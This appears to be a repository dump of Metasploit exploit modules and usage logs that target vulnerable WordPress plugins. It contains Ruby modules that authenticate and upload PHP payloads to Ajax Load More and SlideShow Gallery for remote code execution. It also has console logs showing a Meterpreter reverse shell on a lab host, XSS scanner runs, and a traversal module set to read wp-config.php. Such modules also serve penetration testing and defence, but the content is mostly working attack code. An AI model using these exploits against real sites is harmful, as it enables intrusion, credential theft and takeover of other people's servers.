| 'Author' => 24 | [ 25 | 'Unknown', # Identify yourself || send an PR here 26 | 'Roberto Soares Espreto ' # Metasploit Module 27 | ], 28 | 'License' => MSF_LICENSE, 29 | 'References' => 30 | [ 31 | ['WPVDB', '8209'] 32 | ], 33 | 'Privileged' => false, 34 | 'Platform' => 'php', 35 | 'Arch' => ARCH_PHP, 36 | 'Targets' => [['Ajax Load More 2.8.1.1', {}]], 37 | 'DisclosureDate' => 'Oct 10 2015', 38 | 'DefaultTarget' => 0 39 | )) 40 | 41 | register_options( 42 | [ 43 | OptString.new('WP_USERNAME', [true, 'A valid username', nil]), 44 | OptString.new('WP_PASSWORD', [true, 'Valid password for the provided username', nil]) 45 | ], self.class 46 | ) 47 | end 48 | 49 | def check 50 | check_plugin_version_from_readme('ajax-load-more', '2.8.1.2') 51 | end 52 | 53 | def username 54 | datastore['WP_USERNAME'] 55 | end 56 | 57 | def password 58 | datastore['WP_PASSWORD'] 59 | end 60 | 61 | def get_nonce(cookie) 62 | res = send_request_cgi( 63 | 'method' => 'GET', 64 | 'uri' => normalize_uri(wordpress_url_backend, 'admin.php'), 65 | 'vars_get' => { 66 | 'page' => 'ajax-load-more-repeaters' 67 | }, 68 | 'cookie' => cookie 69 | ) 70 | 71 | if res && res.body && res.body =~ /php","alm_admin_nonce":"([a-z0-9]+)"}/ 72 | return Regexp.last_match[1] 73 | else 74 | return nil 75 | end 76 | end 77 | 78 | def exploit 79 | vprint_status("#{peer} - Trying to login as #{username}") 80 | cookie = wordpress_login(username, password) 81 | fail_with(Failure::NoAccess, "#{peer} - Unable to login as: #{username}") if cookie.nil? 82 | 83 | vprint_status("#{peer} - Trying to get nonce") 84 | nonce = get_nonce(cookie) 85 | fail_with(Failure::Unknown, "#{peer} - Unable to get nonce") if nonce.nil? 86 | 87 | vprint_status("#{peer} - Trying to upload payload") 88 | filename = 'default.php' 89 | 90 | print_status("#{peer} - Uploading payload") 91 | res = send_request_cgi( 92 | 'method' => 'POST', 93 | 'uri' => normalize_uri(wordpress_url_backend, 'admin-ajax.php'), 94 | 'vars_post' => { 95 | 'action' => 'alm_save_repeater', 96 | 'value' => payload.encoded, 97 | 'repeater' => 'default', 98 | 'type' => 'default', 99 | 'alias' => '', 100 | 'nonce' => nonce 101 | }, 102 | 'cookie' => cookie 103 | ) 104 | 105 | if res 106 | if res.code == 200 && res.body.include?('Template Saved Successfully') 107 | register_files_for_cleanup(filename) 108 | else 109 | fail_with(Failure::Unknown, "#{peer} - You do not have sufficient permissions to access this page.") 110 | end 111 | else 112 | fail_with(Failure::Unknown, 'Server did not respond in an expected way') 113 | end 114 | 115 | print_status("#{peer} - Calling uploaded file") 116 | send_request_cgi( 117 | 'uri' => normalize_uri(wordpress_url_plugins, 'ajax-load-more', 'core', 'repeater', filename) 118 | ) 119 | end 120 | end 121 | -------------------------------------------------------------------------------- /documentation/exploits/wp_acf_frontend_display_file_upload.md: -------------------------------------------------------------------------------- 1 | #### Add WordPress ACF FrontEnd Display Plugin File Upload Vulnerability. 2 | 3 | Application: WordPress Plugin "ACF FrontEnd Display" 2.0.5 4 | Homepage: https://wordpress.org/plugins/acf-frontend-display/ 5 | Source Code: https://www.exploit-db.com/apps/62a3a9c3b3867c0a37a7e91f9de53f12-acf-frontend-display.2.0.5.zip 6 | 7 | #### Vulnerable packages* 8 | 9 | 2.0.5 10 | 11 | #### Usage: 12 | 13 | ##### Linux (Ubuntu 12.04.5 LTS): 14 | ``` 15 | msfdevel 10.10.10.10 shell[s]:0 job[s]:0 msf> use exploit/unix/webapp/wp_acf_frontend_display_file_upload 16 | msfdevel 10.10.10.10 shell[s]:0 job[s]:0 msf> exploit(wp_acf_frontend_display_file_upload) show options 17 | 18 | Module options (exploit/unix/webapp/wp_acf_frontend_display_file_upload): 19 | 20 | Name Current Setting Required Description 21 | ---- --------------- -------- ----------- 22 | Proxies no A proxy chain of format type:host:port[,type:host:port][...] 23 | RHOST yes The target address 24 | RPORT 80 yes The target port 25 | TARGETURI / yes The base path to the wordpress application 26 | VHOST no HTTP server virtual host 27 | 28 | 29 | Exploit target: 30 | 31 | Id Name 32 | -- ---- 33 | 0 ACF FrontEnd Display 2.0.5 34 | 35 | 36 | msfdevel 10.10.10.10 shell[s]:0 job[s]:0 msf> exploit(wp_acf_frontend_display_file_upload) info 37 | 38 | Name: WordPress ACF FrontEnd Display Upload Vulnerability 39 | Module: exploit/unix/webapp/wp_acf_frontend_display_file_upload 40 | Platform: PHP 41 | Privileged: No 42 | License: Metasploit Framework License (BSD) 43 | Rank: Excellent 44 | Disclosed: 2015-07-03 45 | 46 | Provided by: 47 | TUNISIAN CYBER 48 | Roberto Soares Espreto 49 | 50 | Available targets: 51 | Id Name 52 | -- ---- 53 | 0 ACF FrontEnd Display 2.0.5 54 | 55 | Basic options: 56 | Name Current Setting Required Description 57 | ---- --------------- -------- ----------- 58 | Proxies no A proxy chain of format type:host:port[,type:host:port][...] 59 | RHOST yes The target address 60 | RPORT 80 yes The target port 61 | TARGETURI / yes The base path to the wordpress application 62 | VHOST no HTTP server virtual host 63 | 64 | Payload information: 65 | 66 | Description: 67 | This module exploits an arbitrary PHP code upload in the WordPress 68 | ACF FrontEnd Display version 2.0.5. The vulnerability allows for 69 | arbitrary file upload and remote code execution. 70 | 71 | References: 72 | https://www.exploit-db.com/exploits/37514 73 | https://wpvulndb.com/vulnerabilities/7867 74 | http://packetstormsecurity.com/files/132590/ 75 | http://www.antihackers.ro/blog/wordpress-acf-frontend-display-plugin-2-0-5-file-upload-vulnerability/ 76 | 77 | msfdevel 10.10.10.10 shell[s]:0 job[s]:0 msf> exploit(wp_acf_frontend_display_file_upload) set RHOST 10.10.10.20 78 | RHOST => 10.10.10.20 79 | msfdevel 10.10.10.10 shell[s]:0 job[s]:0 msf> exploit(wp_acf_frontend_display_file_upload) check 80 | [*] 10.10.10.20:80 - The target appears to be vulnerable. 81 | msfdevel 10.10.10.10 shell[s]:0 job[s]:0 msf> exploit(wp_acf_frontend_display_file_upload) exploit 82 | 83 | [*] Started reverse handler on 10.10.10.10:4444 84 | [*] 10.10.10.20:80 - Calling payload... 85 | [*] Sending stage (32461 bytes) to 10.10.10.20 86 | [*] Meterpreter session 3 opened (10.10.10.10:4444 -> 10.10.10.20:42508) at 2015-08-01 18:36:36 -0300 87 | [+] Deleted lObRcITyBeDR.php 88 | 89 | meterpreter > sysinfo 90 | Computer : msfdevel 91 | OS : Linux msfdevel 3.13.0-61-generic #100~precise1-Ubuntu SMP Wed Jul 29 12:07:07 UTC 2015 i686 92 | Meterpreter : php/php 93 | meterpreter > shell 94 | Process 3774 created. 95 | Channel 0 created. 96 | 97 | id 98 | uid=33(www-data) gid=33(www-data) groups=33(www-data) 99 | ^Z 100 | Background channel 0? [y/N] y 101 | meterpreter > background 102 | [*] Backgrounding session 3... 103 | msfdevel 10.10.10.10 shell[s]:1 job[s]:0 msf> exploit(wp_acf_frontend_display_file_upload) 104 | ``` 105 | -------------------------------------------------------------------------------- /documentation/auxiliary/wp_ninja_forms_xss_scanner.md: -------------------------------------------------------------------------------- 1 | #### Add WordPress Plugin Ninja Forms XSS Vulnerability. 2 | 3 | Application: WordPress Plugin 'Ninja Forms' 2.9.21 4 | Homepage: https://wordpress.org/plugins/ninja-forms 5 | Source Code: https://downloads.wordpress.org/plugin/ninja-forms.2.9.21.zip 6 | References: https://wpvulndb.com/vulnerabilities/8128 7 | Active Install: +200.000 8 | 9 | #### Vulnerable packages* 10 | 11 | 2.9.21 12 | 13 | #### Module 14 | 15 | [wp_ninja_forms_xss_scanner.rb](https://github.com/espreto/wpsploit/blob/master/modules/auxiliary/scanner/http/wordpress/wp_ninja_forms_xss_scanner.rb) 16 | 17 | #### Usage: 18 | 19 | ##### Linux (Ubuntu 14.04.2 LTS): 20 | ``` 21 | msfdevel 10.10.10.10 shell[s]:0 job[s]:0 msf> use auxiliary/scanner/http/wp_ninja_forms_xss_scanner 22 | msfdevel 10.10.10.10 shell[s]:0 job[s]:0 msf> auxiliary(wp_ninja_forms_xss_scanner) show options 23 | 24 | Module options (auxiliary/scanner/http/wp_ninja_forms_xss_scanner): 25 | 26 | Name Current Setting Required Description 27 | ---- --------------- -------- ----------- 28 | Proxies no A proxy chain of format type:host:port[,type:host:port][...] 29 | RHOSTS yes The target address range or CIDR identifier 30 | RPORT 80 yes The target port 31 | TARGETURI / yes The base path to the wordpress application 32 | THREADS 1 yes The number of concurrent threads 33 | VHOST no HTTP server virtual host 34 | WP_PASS yes A valid password 35 | WP_USER yes A valid username 36 | 37 | msfdevel 10.10.10.10 shell[s]:0 job[s]:0 msf> auxiliary(wp_ninja_forms_xss_scanner) info 38 | 39 | Name: WordPress Ninja Forms XSS Scanner 40 | Module: auxiliary/scanner/http/wp_ninja_forms_xss_scanner 41 | License: Metasploit Framework License (BSD) 42 | Rank: Normal 43 | Disclosed: 2015-07-14 44 | 45 | Provided by: 46 | Morten Nørtoft, Kenneth Jepsen, Mikkel Vej 47 | Roberto Soares Espreto 48 | 49 | Basic options: 50 | Name Current Setting Required Description 51 | ---- --------------- -------- ----------- 52 | Proxies no A proxy chain of format type:host:port[,type:host:port][...] 53 | RHOSTS yes The target address range or CIDR identifier 54 | RPORT 80 yes The target port 55 | TARGETURI / yes The base path to the wordpress application 56 | THREADS 1 yes The number of concurrent threads 57 | VHOST no HTTP server virtual host 58 | WP_PASS yes A valid password 59 | WP_USER yes A valid username 60 | 61 | Description: 62 | This module attempts to exploit an Authenticated Cross-Site 63 | Scripting in Ninja Forms Plugin for WordPress, version 2.9.21 and 64 | likely prior in order if the instance is vulnerable. 65 | 66 | References: 67 | https://wpvulndb.com/vulnerabilities/8128 68 | https://packetstormsecurity.com/files/132913/ 69 | 70 | msfdevel 10.10.10.10 shell[s]:0 job[s]:0 msf> auxiliary(wp_ninja_forms_xss_scanner) set RHOSTS 10.10.10.20 71 | RHOSTS => 10.10.10.20 72 | msfdevel 10.10.10.10 shell[s]:0 job[s]:0 msf> auxiliary(wp_ninja_forms_xss_scanner) set WP_USER espreto 73 | WP_USER => espreto 74 | msfdevel 10.10.10.10 shell[s]:0 job[s]:0 msf> auxiliary(wp_ninja_forms_xss_scanner) set WP_PASS R@x0rP@55 75 | WP_PASS => R@x0rP@55 76 | msfdevel 10.10.10.10 shell[s]:0 job[s]:0 msf> auxiliary(wp_ninja_forms_xss_scanner) check 77 | [*] 10.10.10.20:80 - The target appears to be vulnerable. 78 | [*] Checked 1 of 1 hosts (100% complete) 79 | msfdevel 10.10.10.10 shell[s]:0 job[s]:0 msf> auxiliary(wp_ninja_forms_xss_scanner) run 80 | 81 | [+] 10.10.10.20:80 - Vulnerable to Cross-Site Scripting the Ninja Forms 2.9.21 plugin for WordPress 82 | [+] Save in: /home/espreto/.msf4/local/script.html 83 | [*] Scanned 1 of 1 hosts (100% complete) 84 | [*] Auxiliary module execution completed 85 | msfdevel 10.10.10.10 shell[s]:0 job[s]:0 msf> auxiliary(wp_ninja_forms_xss_scanner) firefox /home/espreto/.msf4/local/script.html 86 | ``` 87 | This will open the browser: 88 | 89 | ![XSS](../images/wp_ninja_forms_xss_scanner.png) 90 | -------------------------------------------------------------------------------- /documentation/auxiliary/wp_database_sync_xss_scanner.md: -------------------------------------------------------------------------------- 1 | #### Add WordPress Plugin Database Sync XSS Vulnerability. 2 | 3 | Application: WordPress Plugin 'Database Sync' 0.4 4 | Homepage: https://wordpress.org/plugins/database-sync 5 | Source Code: https://downloads.wordpress.org/plugin/database-sync.0.4.zip 6 | References: https://wpvulndb.com/vulnerabilities/8127 7 | Active Install: +1.000 8 | 9 | #### Vulnerable packages* 10 | 11 | 0.4 12 | 13 | #### Module 14 | 15 | [wp_database_sync_xss_scanner.rb](https://github.com/espreto/wpsploit/blob/master/modules/auxiliary/scanner/http/wordpress/wp_database_sync_xss_scanner.rb) 16 | 17 | #### Usage: 18 | 19 | ##### Linux (Ubuntu 14.04.2 LTS): 20 | ``` 21 | msfdevel 10.10.10.10 shell[s]:0 job[s]:0 msf> use auxiliary/scanner/http/wp_database_sync_xss_scanner 22 | msfdevel 10.10.10.10 shell[s]:0 job[s]:0 msf> auxiliary(wp_database_sync_xss_scanner) show options 23 | 24 | Module options (auxiliary/scanner/http/wp_database_sync_xss_scanner): 25 | 26 | Name Current Setting Required Description 27 | ---- --------------- -------- ----------- 28 | Proxies no A proxy chain of format type:host:port[,type:host:port][...] 29 | RHOSTS yes The target address range or CIDR identifier 30 | RPORT 80 yes The target port 31 | TARGETURI / yes The base path to the wordpress application 32 | THREADS 1 yes The number of concurrent threads 33 | VHOST no HTTP server virtual host 34 | WP_PASS no A valid password 35 | WP_USER no A valid username 36 | 37 | msfdevel 10.10.10.10 shell[s]:0 job[s]:0 msf> auxiliary(wp_database_sync_xss_scanner) info 38 | 39 | Name: WordPress Database Sync XSS Scanner 40 | Module: auxiliary/scanner/http/wp_database_sync_xss_scanner 41 | License: Metasploit Framework License (BSD) 42 | Rank: Normal 43 | Disclosed: 2015-08-04 44 | 45 | Provided by: 46 | Morten Nørtoft, Kenneth Jepsen & Mikkel Vej 47 | Roberto Soares Espreto 48 | 49 | Basic options: 50 | Name Current Setting Required Description 51 | ---- --------------- -------- ----------- 52 | Proxies no A proxy chain of format type:host:port[,type:host:port][...] 53 | RHOSTS yes The target address range or CIDR identifier 54 | RPORT 80 yes The target port 55 | TARGETURI / yes The base path to the wordpress application 56 | THREADS 1 yes The number of concurrent threads 57 | VHOST no HTTP server virtual host 58 | WP_PASS no A valid password 59 | WP_USER no A valid username 60 | 61 | Description: 62 | This module attempts to exploit an Cross-Site Scripting in Database 63 | Sync Plugin for WordPress, version 0.4 and likely prior in order if 64 | the instance is vulnerable. 65 | 66 | References: 67 | https://wpvulndb.com/vulnerabilities/8127 68 | https://packetstormsecurity.com/files/132907/ 69 | 70 | msfdevel 10.10.10.10 shell[s]:0 job[s]:0 msf> auxiliary(wp_database_sync_xss_scanner) set RHOSTS 10.10.10.20 71 | RHOSTS => 10.10.10.20 72 | msfdevel 10.10.10.10 shell[s]:0 job[s]:0 msf> auxiliary(wp_database_sync_xss_scanner) set WP_USER espreto 73 | WP_USER => espreto 74 | msfdevel 10.10.10.10 shell[s]:0 job[s]:0 msf> auxiliary(wp_database_sync_xss_scanner) set WP_PASS R@x0rP@55 75 | WP_PASS => R@x0rP@55 76 | msfdevel 10.10.10.10 shell[s]:0 job[s]:0 msf> auxiliary(wp_database_sync_xss_scanner) check 77 | [*] 10.10.10.20:80 - The target appears to be vulnerable. 78 | [*] Checked 1 of 1 hosts (100% complete) 79 | msfdevel 10.10.10.10 shell[s]:0 job[s]:0 msf> auxiliary(wp_database_sync_xss_scanner) run 80 | 81 | [+] 10.10.10.20:80 - Vulnerable to Cross-Site Scripting the Database Sync 0.4 plugin for WordPress 82 | [+] Save in: /home/espreto/.msf4/local/script.html 83 | [*] Scanned 1 of 1 hosts (100% complete) 84 | [*] Auxiliary module execution completed 85 | msfdevel 10.10.10.10 shell[s]:0 job[s]:0 msf> auxiliary(wp_database_sync_xss_scanner) firefox /home/espreto/.msf4/local/script.html 86 | ``` 87 | This will open the browser: 88 | 89 | ![XSS](../images/wp_database_sync_xss_scanner.png) 90 | -------------------------------------------------------------------------------- /modules/exploits/unix/webapp/wp_slideshowgallery_file_upload.rb: -------------------------------------------------------------------------------- 1 | ## 2 | # This module requires Metasploit: http://metasploit.com/download 3 | # Current source: https://github.com/rapid7/metasploit-framework 4 | ## 5 | 6 | require 'msf/core' 7 | 8 | class MetasploitModule < Msf::Exploit::Remote 9 | Rank = ExcellentRanking 10 | 11 | include Msf::Exploit::Remote::HTTP::Wordpress 12 | include Msf::Exploit::FileDropper 13 | 14 | def initialize(info = {}) 15 | super(update_info( 16 | info, 17 | 'Name' => 'WordPress SlideShow Gallery Authenticated File Upload', 18 | 'Description' => %q{ 19 | The WordPress SlideShow Gallery plugin contains an authenticated file upload 20 | vulnerability. We can upload arbitrary files to the upload folder, because 21 | the plugin also uses it's own file upload mechanism instead of the wordpress 22 | api it's possible to upload any file type. 23 | }, 24 | 'Author' => 25 | [ 26 | 'Jesus Ramirez Pichardo', # Vulnerability discovery 27 | 'Roberto Soares Espreto ' # Metasploit module 28 | ], 29 | 'License' => MSF_LICENSE, 30 | 'References' => 31 | [ 32 | ['CVE', '2014-5460'], 33 | ['EDB', '34681'], 34 | ['WPVDB', '7532'] 35 | ], 36 | 'Privileged' => false, 37 | 'Platform' => ['php'], 38 | 'Arch' => ARCH_PHP, 39 | 'Targets' => [['WP SlideShow Gallery 1.4.6', {}]], 40 | 'DefaultTarget' => 0, 41 | 'DisclosureDate' => 'Aug 28 2014')) 42 | 43 | register_options( 44 | [ 45 | OptString.new('WP_USER', [true, 'A valid username', nil]), 46 | OptString.new('WP_PASSWORD', [true, 'Valid password for the provided username', nil]) 47 | ], self.class) 48 | end 49 | 50 | def user 51 | datastore['WP_USER'] 52 | end 53 | 54 | def password 55 | datastore['WP_PASSWORD'] 56 | end 57 | 58 | def check 59 | check_plugin_version_from_readme('slideshow-gallery', '1.4.7') 60 | end 61 | 62 | def exploit 63 | print_status("#{peer} - Trying to login as #{user}") 64 | cookie = wordpress_login(user, password) 65 | if cookie.nil? 66 | print_error("#{peer} - Unable to login as #{user}") 67 | return 68 | end 69 | 70 | print_status("#{peer} - Trying to upload payload") 71 | filename = "#{rand_text_alpha_lower(8)}.php" 72 | 73 | data = Rex::MIME::Message.new 74 | data.add_part("", nil, nil, 'form-data; name="Slide[id]"') 75 | data.add_part("", nil, nil, 'form-data; name="Slide[link]"') 76 | data.add_part("", nil, nil, 'form-data; name="Slide[image_url]"') 77 | data.add_part('both', nil, nil, 'form-data; name="Slide[showinfo]"') 78 | data.add_part('randonx', nil, nil, 'form-data; name="Slide[description]"') 79 | data.add_part('file', nil, nil, 'form-data; name="Slide[type]"') 80 | data.add_part('randonx', nil, nil, 'form-data; name="Slide[title]"') 81 | data.add_part('70', nil, nil, 'form-data; name="Slide[iopacity]"') 82 | data.add_part('N', nil, nil, 'form-data; name="Slide[uselink]"') 83 | data.add_part("", nil, nil, 'form-data; name="Slide[order]"') 84 | data.add_part('self', nil, nil, 'form-data; name="Slide[linktarget]"') 85 | data.add_part(payload.encoded, 'application/x-httpd-php', nil, "form-data; name=\"image_file\"; filename=\"#{filename}\"") 86 | post_data = data.to_s 87 | 88 | print_status("#{peer} - Uploading payload") 89 | res = send_request_cgi({ 90 | 'method' => 'POST', 91 | 'uri' => normalize_uri(wordpress_url_backend, 'admin.php'), 92 | 'ctype' => "multipart/form-data; boundary=#{data.bound}", 93 | 'vars_get' => { 94 | 'page' => 'slideshow-slides', 95 | 'method' => 'save' 96 | }, 97 | 'data' => post_data, 98 | 'cookie' => cookie 99 | }) 100 | 101 | if res 102 | if res.code == 200 103 | register_files_for_cleanup(filename) 104 | else 105 | fail_with(Failure::Unknown, "#{peer} - You do not have sufficient permissions to access this page.") 106 | end 107 | else 108 | fail_with(Failure::Unknown, 'Server did not respond in an expected way') 109 | end 110 | 111 | print_status("#{peer} - Calling uploaded file #{filename}") 112 | send_request_cgi( 113 | 'uri' => normalize_uri(wordpress_url_wp_content, 'uploads', 'slideshow-gallery', filename) 114 | ) 115 | end 116 | end 117 | -------------------------------------------------------------------------------- /documentation/auxiliary/wp_thecartpress_xss_scanner.md: -------------------------------------------------------------------------------- 1 | #### Add WordPress Plugin TheCartPress XSS Vulnerability. 2 | 3 | Application: WordPress Plugin 'TheCartPress' 1.3.8.2 4 | Homepage: https://wordpress.org/plugins/thecartpress/ 5 | Source Code: https://downloads.wordpress.org/plugin/thecartpress.1.3.8.2.zip 6 | References: https://wpvulndb.com/vulnerabilities/7951 7 | 8 | #### Vulnerable packages* 9 | 10 | 1.3.8.2 11 | 12 | #### Usage: 13 | 14 | ##### Linux (Ubuntu 12.04.5 LTS): 15 | ``` 16 | msf > use auxiliary/scanner/http/wp_thecartpress_xss_scanner 17 | msf auxiliary(wp_thecartpress_xss_scanner) > show options 18 | 19 | Module options (auxiliary/scanner/http/wp_thecartpress_xss_scanner): 20 | 21 | Name Current Setting Required Description 22 | ---- --------------- -------- ----------- 23 | Proxies no A proxy chain of format type:host:port[,type:host:port][...] 24 | RHOSTS yes The target address range or CIDR identifier 25 | RPORT 80 yes The target port 26 | TARGETURI / yes The base path to the wordpress application 27 | THREADS 1 yes The number of concurrent threads 28 | VHOST no HTTP server virtual host 29 | WP_PASSWORD yes Valid password for the provided username 30 | WP_USER yes A valid username 31 | 32 | msf auxiliary(wp_thecartpress_xss_scanner) > info 33 | 34 | Name: WordPress TheCartPress Plugin XSS Scanner 35 | Module: auxiliary/scanner/http/wp_thecartpress_xss_scanner 36 | License: Metasploit Framework License (BSD) 37 | Rank: Normal 38 | Disclosed: 2015-04-29 39 | 40 | Provided by: 41 | High-Tech Bridge 42 | Roberto Soares Espreto 43 | 44 | Basic options: 45 | Name Current Setting Required Description 46 | ---- --------------- -------- ----------- 47 | Proxies no A proxy chain of format type:host:port[,type:host:port][...] 48 | RHOSTS yes The target address range or CIDR identifier 49 | RPORT 80 yes The target port 50 | TARGETURI / yes The base path to the wordpress application 51 | THREADS 1 yes The number of concurrent threads 52 | VHOST no HTTP server virtual host 53 | WP_PASSWORD yes Valid password for the provided username 54 | WP_USER yes A valid username 55 | 56 | Description: 57 | This module attempts to exploit a authenticated Cross-Site Scripting 58 | in TheCartPress Plugin for WordPress, version 1.3.8.2 and likely prior 59 | in order if the instance is vulnerable. 60 | 61 | References: 62 | http://cvedetails.com/cve/2015-3302/ 63 | http://www.exploit-db.com/exploits/36860 64 | https://wpvulndb.com/vulnerabilities/7951 65 | https://www.htbridge.com/advisory/HTB23254 66 | 67 | msf auxiliary(wp_thecartpress_xss_scanner) > show missing 68 | 69 | Module options (auxiliary/scanner/http/wp_thecartpress_xss_scanner): 70 | 71 | Name Current Setting Required Description 72 | ---- --------------- -------- ----------- 73 | RHOSTS yes The target address range or CIDR identifier 74 | WP_PASSWORD yes Valid password for the provided username 75 | WP_USER yes A valid username 76 | 77 | msf auxiliary(wp_thecartpress_xss_scanner) > set RHOSTS 192.168.1.31 78 | RHOSTS => 192.168.1.31 79 | msf auxiliary(wp_thecartpress_xss_scanner) > set WP_PASSWORD dvd43145 80 | WP_PASSWORD => dvd43145 81 | msf auxiliary(wp_thecartpress_xss_scanner) > set WP_USER espreto 82 | WP_USER => espreto 83 | msf auxiliary(wp_thecartpress_xss_scanner) > check 84 | [*] 192.168.1.31:80 - The target appears to be vulnerable. 85 | [*] Checked 1 of 1 hosts (100% complete) 86 | msf auxiliary(wp_thecartpress_xss_scanner) > run 87 | 88 | [*] 10.10.10.20:80 - Trying to login as espreto 89 | [+] 10.10.10.20:80 - Login successful 90 | [+] 10.10.10.20:80 - Vulnerable to Cross-Site Scripting the "TheCartPress 1.3.8.2" plugin for WordPress 91 | [+] Save in: /home/espreto/.msf4/local/VMJNlBEi.html 92 | [*] Scanned 1 of 1 hosts (100% complete) 93 | [*] Auxiliary module execution completed 94 | msf auxiliary(wp_thecartpress_xss_scanner) > firefox /home/espreto/.msf4/local/VMJNlBEi.html 95 | ``` 96 | This will open the browser: 97 | 98 | ![XSS](../images/wp_thecartpress_xss_scanner.png) 99 | 100 | -------------------------------------------------------------------------------- /documentation/auxiliary/wp_gimedia_library_file_read.md: -------------------------------------------------------------------------------- 1 | #### Add WordPress Plugin GI-Media Library File Read Vulnerability. 2 | 3 | Application: WordPress Plugin 'GI-Media Library' 2.2.2 4 | Homepage: https://wordpress.org/plugins/gi-media-library 5 | Source Code: https://downloads.wordpress.org/plugin/gi-media-library.2.2.2.zip 6 | References: https://wpvulndb.com/vulnerabilities/7754 7 | 8 | #### Vulnerable packages* 9 | 10 | 2.2.2 11 | 12 | #### Usage: 13 | 14 | ##### Linux (Ubuntu 12.04.5 LTS): 15 | ``` 16 | msf > use auxiliary/scanner/http/wp_gimedia_library_file_read 17 | msf auxiliary(wp_gimedia_library_file_read) > show options 18 | 19 | Module options (auxiliary/scanner/http/wp_gimedia_library_file_read): 20 | 21 | Name Current Setting Required Description 22 | ---- --------------- -------- ----------- 23 | DEPTH 3 yes Traversal Depth (to reach the wordpress root folder) 24 | FILEPATH wp-config.php yes The file to read 25 | Proxies no A proxy chain of format type:host:port[,type:host:port][...] 26 | RHOSTS yes The target address range or CIDR identifier 27 | RPORT 80 yes The target port 28 | TARGETURI / yes The base path to the wordpress application 29 | THREADS 1 yes The number of concurrent threads 30 | VHOST no HTTP server virtual host 31 | 32 | msf auxiliary(wp_gimedia_library_file_read) > info 33 | 34 | Name: WordPress GI-Media Library Plugin File Read Vulnerability 35 | Module: auxiliary/scanner/http/wp_gimedia_library_file_read 36 | License: Metasploit Framework License (BSD) 37 | Rank: Normal 38 | 39 | Provided by: 40 | Unknown 41 | Roberto Soares Espreto 42 | 43 | Basic options: 44 | Name Current Setting Required Description 45 | ---- --------------- -------- ----------- 46 | DEPTH 3 yes Traversal Depth (to reach the wordpress root folder) 47 | FILEPATH wp-config.php yes The file to read 48 | Proxies no A proxy chain of format type:host:port[,type:host:port][...] 49 | RHOSTS yes The target address range or CIDR identifier 50 | RPORT 80 yes The target port 51 | TARGETURI / yes The base path to the wordpress application 52 | THREADS 1 yes The number of concurrent threads 53 | VHOST no HTTP server virtual host 54 | 55 | Description: 56 | This module exploits a directory traversal vulnerability in 57 | WordPress Plugin "GI-Media Library" version 2.2.2, allowing to read 58 | arbitrary files on WordPress directory. 59 | 60 | References: 61 | https://wpvulndb.com/vulnerabilities/7754 62 | http://wordpressa.quantika14.com/repository/index.php?id=24 63 | 64 | msf auxiliary(wp_gimedia_library_file_read) > set RHOSTS 192.168.1.31 65 | RHOSTS => 192.168.1.31 66 | msf auxiliary(wp_gimedia_library_file_read) > run 67 | 68 | [*] Downloading file... 69 | 70 | 114 | 115 | ``` 116 | --------------------------------------------------------------------------------